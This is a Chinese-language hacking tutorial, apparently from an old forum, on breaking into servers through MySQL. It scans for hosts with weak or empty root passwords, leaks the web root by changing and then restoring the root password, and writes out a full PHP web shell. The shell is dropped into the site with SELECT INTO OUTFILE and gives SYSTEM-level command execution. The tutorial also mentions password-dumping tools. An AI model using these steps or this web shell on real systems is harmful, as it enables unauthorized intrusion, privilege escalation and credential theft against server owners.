快速的扫描有空弱密码的主机：

  找了半天发觉还是小榕的流光好用哈.
简单的说一下设置过程:探测-->高级扫描工具-->只要MISC选项卡-->选中其中的猜解MYSQL密码
然后在选项卡中更改用户名/密码文件用户名我认为只要root就够了,流光自带的那个不好哟


  如何简单的利用MYSQL得到网站的实际路径：
一步:看用户得加密HASH
select * from user
因为我们并不知道到底是哪个用户来连接的数据库所以建议你全记下来
不过一般都是root@localhost咯

二步:一个一个的改密码:
set password for root@localhost=password('test')

象上面这样就把root@localhost的密码改成了test
然后我们来观察网页是否出错如果出错的话多半就是提示root@127.0.0.1不能
连接数据库了,这样我们就能看到实际目录了

三步:把密码改回来这儿有人可能要说我们不知道原来的密码是多少怎么改呢
先前我们不是记下了原密码的HASH吗,现在我们再把它写回去不就可以了

update user set password='67457e226a1a15bd' where host='localhost' and user='root'

这时可能有人会说可以写进去怎么不行啊?我们还得强制刷新内存授权表，否则用的还是缓冲中的口令

flush privileges

这时有人又会说用set password ... 改密码时为什么没有刷新呢(我也不知道多半MYSQL自已刷新了吧)


   最快的得到系统管理员权限

第一步:在默认的mysql库中生成一个叫tmp的表只有一个字段名叫cmd数据类型为TEXT（可以不分大小写）
use mysql
create table tmp(cmd TEXT);

第二步：在tmp表cmd字段中写入一段PHP代码(注意这个文件导出后一定要叫cmd2.php)

insert into tmp values('<body onload=document.form1.cmd.focus()><?if
(isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd > temp.dat\");}?><style type=\"text/css\"><!\-\- .form1
{BACKGROUND: #FFFFFF; BORDER-BOTTOM: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-RIGHT: #666666
1px solid; BORDER-TOP: #666666 1px solid; COLOR: #3c464f; FONT-SIZE: 9pt; clip: rect( ); cursor: text; height:
auto; width: auto; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px\-\-></style><p
class=\"title2\">&nbsp;</p><form name=\"form1\" method=\\"post\" action=\"/cmd2.php\"> <input type=\"text\"
name=\"cmd\" size=\"50\" class=\"form1\"></form><form name=\"form2\" method=\"post\" action=\"\"> <p> <textarea
name=\"text\" cols=\"120\" rows=\"50\"
class=\"form1\"><?if(isset($cmd)){readfile(\"temp.dat\");unlink(\"temp.dat\");}?></textarea>
</p></form></body>');

写入到你刚才看到的WEB实际目录中（要注意的问题是直接写到你刚才看到路径中可能并不能直接仿问到cmd2.php
你可以从里到外多试试）
select * from tmp into outfile 'd:\\PATH\\cmd2.php';  

删除tmp表,擦PP咯：）
drop table tmp;

第三步仿问cmd2.php
这时你得到的WEB SEHLL可是SYSTEM权限哟,这和一般的CGI/ASP后门不同
同时在执行这个SHELL时有的程序应该输入绝对路径

TIPS：如何把cmd2.php改名在写入到表中时把
<form name=\"form1\" method=\\"post\" action=\"/cmd2.php\">
改成
<form name=\"form1\" method=\\"post\" action=\"/你想要的名字.php\">
就可以了

另外在这样的环境中pulist/findpass等程序都可以正常执行